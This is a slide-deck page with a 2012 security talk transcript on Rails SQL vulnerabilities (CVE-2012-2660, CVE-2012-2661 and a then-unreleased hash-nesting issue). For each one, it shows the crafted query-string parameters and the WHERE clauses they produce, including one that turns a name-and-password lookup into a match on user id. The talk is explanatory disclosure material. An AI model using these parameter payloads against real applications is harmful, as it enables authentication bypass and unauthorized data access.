Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins Justin Collins
April 23, 2015
Programming
0
69

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
Avatar for Justin Collins presidentbeef
0
150
The Evolution of Rails Security
Avatar for Justin Collins presidentbeef
1
810
Brakeman RailsConf 2017 Lightning Talk
Avatar for Justin Collins presidentbeef
0
140
Practical Static Analysis for Continuous Application Security
Avatar for Justin Collins presidentbeef
0
200
"...But Doesn't Rails Take Care of Security for Me?"
Avatar for Justin Collins presidentbeef
1
440
Continuous Security with Practical Static Analysis
Avatar for Justin Collins presidentbeef
1
320
Security Automation at Twitter - Rise of the Machines
Avatar for Justin Collins presidentbeef
0
240
The World of Rails Security - RailsConf 2015
Avatar for Justin Collins presidentbeef
8
1.2k
Tales from the Crypt
Avatar for Justin Collins presidentbeef
1
240

Other Decks in Programming

See All in Programming
Ruby Parser progress report 2025
Avatar for yui-knk yui_knk
1
440
Navigation 2 を 3 に移行する(予定)ためにやったこと
Avatar for yokomii yokomii
0
160
rage against annotate_predecessor
Avatar for Junichi Kobayashi junk0612
0
170
Namespace and Its Future
Avatar for Satoshi Tagomori tagomoris
6
700
@Environment(\.keyPath)那么好我不允许你们不知道! / atEnvironment keyPath is so good and you should know it!
Avatar for Elvis Shi lovee
0
120
奥深くて厄介な「改行」と仲良くなる20分
Avatar for おぐえもん oguemon
1
520
ソフトウェアテスト徹底指南書の紹介
Avatar for Hiroki Iseri goyoki
1
150
私の後悔をAWS DMSで解決した話
Avatar for 平目 hiramax
4
210
さようなら Date。 ようこそTemporal! 3年間先行利用して得られた知見の共有
Avatar for 8-beeeaaat!!! 8beeeaaat
3
1.4k
How Android Uses Data Structures Behind The Scenes
Avatar for HyunWoo Lee l2hyunwoo
0
440
AI Coding Agentのセキュリティリスク:PRの自己承認とメルカリの対策
Avatar for さうす s3h
0
200
詳解!defer panic recover のしくみ / Understanding defer, panic, and recover
Avatar for convto convto
0
240

Featured

See All Featured
Let's Do A Bunch of Simple Stuff to Make Websites Faster
Avatar for Chris Coyier chriscoyier
507
140k
Docker and Python
Avatar for Tania Allard trallard
45
3.6k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
Avatar for Marc Duiker marcduiker
31
2.2k
StorybookのUI Testing Handbookを読んだ
Avatar for Shingo Yamazaki zakiyama
31
6.1k
Agile that works and the tools we love
Avatar for Rasmus Luckow-Nielsen rasmusluckow
330
21k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
Avatar for Eileen M. Uchitelle eileencodes
26
3k
The World Runs on Bad Software
Avatar for Brandon Keepers bkeepers
PRO
70
11k
[RailsConf 2023] Rails as a piece of cake
Avatar for Vladimir Dementyev palkan
57
5.8k
JavaScript: Past, Present, and Future - NDC Porto 2020
Avatar for David Neal reverentgeek
51
5.6k
Building a Scalable Design System with Sketch
Avatar for Laura Van Doore lauravandoore
462
33k
Put a Button on it: Removing Barriers to Going Fast.
Avatar for kastner kastner
60
4k
Learning to Love Humans: Emotional Interface Design
Avatar for Aarron Walter aarron
273
40k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1